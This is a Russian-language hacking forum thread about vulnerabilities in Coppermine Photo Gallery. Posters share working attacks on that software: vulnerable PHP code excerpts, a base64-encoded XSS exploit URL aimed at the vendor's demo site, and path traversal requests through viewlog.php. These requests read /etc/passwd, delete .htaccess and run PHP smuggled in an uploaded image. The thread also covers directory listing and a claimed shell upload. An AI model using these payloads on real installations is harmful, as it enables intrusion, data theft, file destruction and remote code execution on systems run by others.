Старый 05.08.2010, 13:59   #1
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию Coppermine Photo Gallery

Продукт: Coppermine Photo Gallery 1.5 <= 1.5.10 Passive XSS
Офф сайт: coppermine-gallery.net
Зависимости: Нет
Уязвимые файлы: /help.php
Уязвимый кусок кода:
PHP код:
if ($base != '') {
    
// content of header and text have been base64-encoded - decode it now
    
$header = @unserialize(@base64_decode($header));


                . . . . . . . . . . .


if (
$header != '') {
    
$content '<h1>'.$header.'</h1>';
    
$content .= $text;
} else {
    
$content '';

Exploit:
http://coppermine-gallery.net/demo/cpg15x/help.php?base=1&h=czozMjoiPHNjcmlwdD5hbGVydCgnaGVo ZWhlJyk8L3NjcmlwdD4iOz==

Последний раз редактировалось asddas; 28.12.2010 в 23:32.. Причина: изменение заголовка
asddas вне форума   Ответить с цитированием
Старый 28.12.2010, 23:31   #2
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию

http://www.securitylab.ru/vulnerability/403723.php
http://www.waraxe.us/advisory-79.html
Спалили
asddas вне форума   Ответить с цитированием
Старый 25.09.2013, 10:00   #3
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

Coppermine Photo Gallery <= 1.4.6
Зависимость : права админа
может быть и более поздние
LFI в админке

уязвимый код
Код:
$log = @$_GET['log'];
$action = @$_GET['action'];

pageheader('Logs :: '.$log);
.....................................

if (!isset($log)) {
        display_log_list();
} else {
               display_log($log);
}
.................................
function display_log($logname)
{
..................
log_read($logname);
........................
}

...............................
function log_read( $log = null ) {
        if (is_null($log)) {
                $log = CPG_GLOBAL_LOG;
        }

        $log = 'logs/'.$log.'.log.php';

        @include($log);
}
POC
Цитата:
cpg146/viewlog.php?log=../../../../../../../../etc/passwd%00

---------------------------
здесь же, удаление произвольного файла
Цитата:
cpg146/viewlog.php?action=dthis&log=../.htaccess%00

--------------------------------------
epic win

+ в конфиге выбираем обработчик изображений ImageMagick
+ загружаем фотку с php кодом, несмотря на то что админка скажет, что картинка не добавлена, она все равно зальется в альбом юзера
+ cpg146/viewlog.php?log=../albums/userpics/10001/evil.jpg%00 выполняется код


а на десерт, листинг директорий
cpg146/minibrowser.php?folder=/

Последний раз редактировалось vp$; 25.09.2013 в 12:46..
vp$ вне форума   Ответить с цитированием
Старый 23.08.2014, 20:46   #4
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Заливка шелла в 1.4.16 (проверено)
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot